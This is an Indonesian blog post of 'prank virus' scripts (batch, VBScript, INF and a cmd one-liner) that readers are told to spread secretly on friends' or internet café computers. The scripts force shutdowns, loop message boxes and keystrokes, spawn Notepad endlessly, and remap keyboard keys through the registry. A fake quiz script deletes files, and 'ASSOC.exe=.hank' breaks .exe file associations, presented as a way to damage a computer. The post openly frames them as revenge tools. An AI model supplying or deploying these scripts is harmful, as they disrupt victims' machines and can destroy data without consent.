Kamis, 07 Februari 2013 di 03.06 |  

Jail+Tips+Trik Masih ingat dengan fake virus ? Ya itu merupakan software jebakan. Sedangkan Tips dan Trik Jail ini sudah bisa dibilang level di atasnya. But, dengan modal notepad saja, sobat sudah bisa menjailin teman sampai nangis kebingungan kok. Sobat dapat membuat virus ringan sendiri. Cara ini sangat cocok buat balas dendam dengan teman sobat. Heheheh mau ? Cekidot..>>

#Membuat Forced Shut Down
  • Open Notepad >> Copy script di bawah ini :
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
  • Simpan kode script di atas di Notepad dengan nama : xhack.BAT >> type file : All file 
  • Sebarkan File tersebut di Komputer teman sobat, maka Komputer korban akan otomatis FORCED SHOUTDOWN 

#Membuat Tombol Caps-Lock Menyala Terus-Menerus
  • Open Notepad >> Copy script di bawah ini :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop 
  • Simpan kode script di atas di Notepad dengan nama : xhack.VBS >> type file : All file 
  • Sebarkan File tersebut di Komputer teman sobat, maka tombol CAPSLOCK akan menyala terus-menerus (bila dimatikan akan menyala lagi)

#Membuat Pesan Jail Muncul Terus 
  • Open Notepad >> Copy script di bawah ini :
@ECHO off
:Begin
msg * pesan sobat 1
msg * pesan sobat 2
msg * pesan sobat 3
msg * pesan sobat 4
msg * pesan sobat 5
GOTO BEGIN 
  • Simpan kode script di atas di Notepad dengan nama : xhack.BAT >> type file : All file 
  • Sebarkan File tersebut di Komputer teman sobat, maka pesan jail akan muncul terus.

#Membuat CD/DVD Rom Membuka-Tutup
  • Open Notepad >> Copy script di bawah ini :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Simpan kode script di atas di Notepad dengan nama : xhack.VBS >> type file : All file 
  • Sebarkan File tersebut di Komputer teman sobat, maka CD-Rom akan membuka tutup.

#Membuat Script Muncul Terus
  • Open Notepad >> Copy script di bawah ini :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop 
  • Simpan kode script di atas di Notepad dengan nama : xhack.VBS >> type file : All file 
  • Sebarkan File tersebut di Komputer teman sobat, maka script akan muncul terus menerus.

#Membuat Tombol Backspace Menjadi Error [menekan terus menerus] 
  • Open Notepad >> Copy script di bawah ini :
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
  • Simpan kode script di atas di Notepad dengan nama : xhack.VBS >> type file : All file 
  • Sebarkan File tersebut di Komputer teman sobat, maka Tombol Backspace akan error dan menekan dengan sendirinya 

#Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad
  • Open Notepad >> Copy script di bawah ini :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop 
  • Simpan kode script di atas di Notepad dengan nama : xhack.VBS >> type file : All file 
  • Sobat dapat mengganti kata "Komputer Anda Jelek Banget" dengan selera sobat
  • Sebarkan File tersebut di Komputer teman sobat, maka pesan "Komputer Anda Jelek Banget" akan terus muncul

#Membuat Notepad Terbuka Otomatis [Terus menerus]
  • Open Notepad >> Copy script di bawah ini :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
  • Simpan kode script di atas di Notepad dengan nama : xhack.BAT >> type file : All file 
  • Sebarkan File tersebut di Komputer teman sobat, maka notepad akan terbuka terus menerus

#Membuat Notepad dengan Pesan Jail
  • Open Notepad >> Copy script di bawah ini :
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!!" 
  • Simpan kode script di atas di Notepad dengan nama : xhack.VBS >> type file : All file 
  • Sobat dapat mengganti kode berwarna merah dengan selera sobat
  • Sebarkan File tersebut di Komputer teman sobat, maka notepad dengan pesan jail akan terbuka terus menerus

#Membuat Memilih jawaban seperti Quiz di Notepad 
  • Open Notepad >> Copy script di bawah ini :
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
  • Simpan kode script di atas di Notepad dengan nama : xhack.BAT >> type file : All file
  • Sebarkan File tersebut di Komputer teman sobat, maka notepad dengan pertanyaan akan terbuka

#Mematikan Tombol A-I-U-E-O pada Keyboard 
  • Open Notepad >> Copy script di bawah ini :
[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00 
  • Simpan dengan nama "Jail.INF" >> type file : All File
  • Log Off Komputer >> Tombol AIUEO pada keyboard sudah tidak berfungsi.

  • Untuk menormalkan kembali, open notepad >> copy script di bawah ini :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map” 
  • Save dengan nama "Normal.INF" >> type file : All File
  • Log Off Komputer >> Normall !!

#Merusak Komputer Teman/Warnet
  • Buka "CMD" dengan cara >> start >> run >> CMD
  • Ketikan kode di bawah ini:
ASSOC.exe=.hank 
  • Enter !!

  • Cara Mengembalikan >> Buka CMD lagi
  • Ketikan kode di bawah ini :
ASSOC.exe=EXEFILE 
  • Enter !!


Sumber : http://www.adityareinaldo.com/2013/01/tips-trik-super-jail-jebakan-virus.html#ixzz2KD61GpWO
Diposting oleh Unknown Label:

0 komentar:

Visit the Site
MARVEL and SPIDER-MAN: TM & 2007 Marvel Characters, Inc. Motion Picture © 2007 Columbia Pictures Industries, Inc. All Rights Reserved. 2007 Sony Pictures Digital Inc. All rights reserved. blogger template by blog forum.